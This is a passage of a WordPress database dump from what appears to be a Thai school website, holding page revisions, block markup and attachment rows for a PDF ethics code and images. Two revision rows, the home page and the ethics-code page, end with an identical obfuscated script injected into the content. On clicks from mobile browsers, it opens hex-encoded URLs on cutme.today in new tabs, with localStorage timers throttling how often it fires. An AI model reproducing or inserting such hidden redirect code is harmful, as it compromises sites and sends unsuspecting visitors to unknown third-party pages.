-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 17:07:07','2024-08-08 10:07:07','',14,'http://pakhaeng.ssk.in.th/?p=719',0,'revision','',0),
(720,1,'2024-08-08 17:16:22','2024-08-08 10:16:22','','ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ','','inherit','','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%a7%e0%b8%a5%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%a2%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%aa%e0%b8%b3%e0%b8%ab%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b9%80%e0%b8%88-2','','','2024-08-08 17:16:22','2024-08-08 10:16:22','',716,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ-1.pdf',0,'attachment','application/pdf',0),
(721,1,'2024-08-08 17:16:35','2024-08-08 10:16:35','<!-- wp:file {\"id\":720,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ-1.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ-1.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ\"></object><a id=\"wp-block-file--media-6c76f6b2-58bf-4e28-b55d-b85a124820f1\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ-1.pdf\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ-1.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-6c76f6b2-58bf-4e28-b55d-b85a124820f1\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ','','inherit','closed','closed','','716-revision-v1','','','2024-08-08 17:16:35','2024-08-08 10:16:35','',716,'http://pakhaeng.ssk.in.th/?p=721',0,'revision','',0),
(723,1,'2024-08-08 20:54:51','2024-08-08 13:54:51','','ย้าย','','inherit','','closed','','%e0%b8%a2%e0%b9%89%e0%b8%b2%e0%b8%a2','','','2024-08-08 20:54:51','2024-08-08 13:54:51','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png',0,'attachment','image/png',0),
(724,1,'2024-08-08 20:55:12','2024-08-08 13:55:12','','ดูเกรด','','inherit','','closed','','%e0%b8%94%e0%b8%b9%e0%b9%80%e0%b8%81%e0%b8%a3%e0%b8%94','','','2024-08-08 20:55:12','2024-08-08 13:55:12','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png',0,'attachment','image/png',0),
(725,1,'2024-08-08 20:57:22','2024-08-08 13:57:22','','ห้องประชุม','','inherit','','closed','','%e0%b8%ab%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1','','','2024-08-08 20:57:22','2024-08-08 13:57:22','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png',0,'attachment','image/png',0),
(726,1,'2024-08-08 20:57:43','2024-08-08 13:57:43','','SLIP-SSK-1','','inherit','','closed','','slip-ssk-1','','','2024-08-08 20:57:43','2024-08-08 13:57:43','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp',0,'attachment','image/webp',0),
(727,1,'2024-08-08 20:57:58','2024-08-08 13:57:58','','smss-ssk1','','inherit','','closed','','smss-ssk1','','','2024-08-08 20:57:58','2024-08-08 13:57:58','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp',0,'attachment','image/webp',0),
